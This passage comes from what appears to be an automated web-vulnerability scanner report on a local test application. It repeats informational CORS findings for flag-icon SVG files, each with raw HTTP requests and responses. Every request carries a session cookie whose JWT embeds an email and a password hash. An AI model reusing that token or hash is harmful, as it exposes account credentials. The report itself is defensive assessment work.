    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"2372c-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 145196
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <path fill="#c60b1e" d="M0 0h640v480H0z"/>
    <path fill="#ffc400" d="M0 120h640v240H0z"/>
    <path d="M127.27 2
    ...[SNIP]...
    15.35. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/fi.svg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/fi.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/fi.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"fd-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 253
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <path fill="#fff" d="M0 0h640v480H0z"/>
    <path fill="#003580" d="M0 174.545h640v130.909H0z"/>
    <path fill="#
    ...[SNIP]...
    15.36. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/fr.svg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/fr.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/fr.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"12d-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 301
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <g fill-rule="evenodd" stroke-width="1pt">
    <path fill="#fff" d="M0 0h640v480H0z"/>
    <path fill="#00267f
    ...[SNIP]...
    15.37. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/gr.svg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/gr.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/gr.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"333-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 819
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <defs>
    <clipPath id="a">
    <path fill-opacity=".67" d="M0 0h120v90H0z"/>
    </clipPath>
    </defs>
    <
    ...[SNIP]...
    15.38. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/it.svg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/it.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/it.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"13d-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 317
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <g fill-rule="evenodd" stroke-width="1pt">
    <path fill="#fff" d="M0 0h640v479.997H0z"/>
    <path fill="#00
    ...[SNIP]...
    15.39. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/jp.svg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/jp.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/jp.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"1f5-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 501
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <defs>
    <clipPath id="a">
    <path fill-opacity=".67" d="M-88.001 32h640v480h-640z"/>
    </clipPath>

    ...[SNIP]...
    15.40. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/lt.svg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/lt.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/lt.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"1dd-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 477
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <g fill-rule="evenodd" transform="matrix(.64143 0 0 .96773 0 0)" stroke-width="1pt">
    <rect transform="matr
    ...[SNIP]...
    15.41. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/lv.svg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/lv.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/lv.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"fc-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 252
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <g fill-rule="evenodd">
    <path fill="#fff" d="M0 0h640v480.003H0z"/>
    <path fill="#ab231d" d="M0 0h640v1
    ...[SNIP]...
    15.42. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/nl.svg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/nl.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/nl.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"175-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 373
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <g fill-rule="evenodd" stroke-width="1pt" transform="scale(1.25 .9375)">
    <rect rx="0" ry="0" height="509.7
    ...[SNIP]...
    15.43. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/pl.svg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/pl.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/pl.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"e1-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 225
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <g fill-rule="evenodd">
    <path fill="#fff" d="M640 480H0V0h640z"/>
    <path fill="#dc143c" d="M640 480H0V2
    ...[SNIP]...
    15.44. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/pt.svg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/pt.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/pt.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"2fb6-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 12214
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" height="480" width="640" viewBox="0 0 640 480">
    <path fill="red" d="M256 0h384v480H256z"/>
    <path fill="#060" d="M
    ...[SNIP]...
    15.45. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/ru.svg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/ru.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/ru.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"129-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 297
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <g fill-rule="evenodd" stroke-width="1pt">
    <path fill="#fff" d="M0 0h640v480H0z"/>
    <path fill="#0039a6
    ...[SNIP]...
    15.46. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/se.svg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/se.svg

    Issue detail

